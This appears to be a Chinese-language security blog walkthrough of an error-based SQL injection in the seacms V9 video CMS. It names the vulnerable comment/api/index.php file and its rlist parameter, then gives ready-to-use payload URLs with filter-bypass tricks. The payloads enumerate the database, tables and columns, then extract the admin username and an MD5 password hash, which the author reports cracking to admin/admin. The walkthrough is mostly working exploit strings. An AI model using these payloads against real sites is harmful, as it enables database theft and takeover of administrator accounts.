seacms V9 SQL报错注入

0x01 seacm

目录

0x01 seacms介绍

0x02 漏洞分析

0x03 漏洞绕过

1.爆数据库

2.爆表

3.爆字段

4.爆数据

s介绍

海洋影视管理系统（seacms，海洋cms）海洋cms是基于PHP5.X+MySql技术开发的开源CMS，是一套专为不同需求的站长而设计的视频点播系统，灵活，方便，人性化设计简单易用是最大的特色，是快速架设视频网站首选。

0x02 漏洞分析

漏洞文件：./comment/api/index.php，漏洞参数：$rlist

seacmsv9系统数据库（mysql）为seacms，存放管理员账号的表为 sea_admin，表中存放管理员姓名的字段为name，存放管理员密码的字段为password

0x03 漏洞绕过

1.爆数据库

http://127.0.0.1/cmsv9/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,extractvalue(1,concat_ws(0x7e,0x7e,database())),@`%27`

2.爆表

http://127.0.0.1/cmsv9/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0atable_name%20from%23%0ainformation_schema.tables%20where%20table_schema%20=0x736561636d73))),%20@`%27`

并没有成功，但是页面回显内容也没有报错。经过查阅资料，发现是前面sea_comment表没数据，导致并没有执行于是就插入了一条数据，但发现还是没有执行，于是又插入了一条数据，发 现可以执行了。最终注入出数据

3.爆字段

http://127.0.0.1/cmsv9/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0acolumn_name%20from%23%0ainformation_schema.columns%20where%20table_schema%20=0x736561636d73%20and%20table_name=0x7365615f61646d696e%20limit%201,1))),%20@`%27`

http://127.0.0.1/cmsv9/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0acolumn_name%20from%23%0ainformation_schema.columns%20where%20table_schema%20=0x736561636d73%20and%20table_name=0x7365615f61646d696e%20limit%202,1))),%20@`%27`

4.爆数据

http://127.0.0.1/cmsv9/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,updatexml%20(1,concat_ws(0x7e,0x7e,(select%20name%20from%23%0asea_admin%20limit%200,1)),1),%20@`%27`

http://127.0.0.1/cmsv9/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,updatexml%20(1,concat_ws(0x7e,0x7e,(select%20password%20from%23%0asea_admin%20limit%200,1)),1),%20@`%27`

注入密码为f297a57a5a743894a0e4，可以看出是经过md5加密的,解密后得到账号密码，均为admin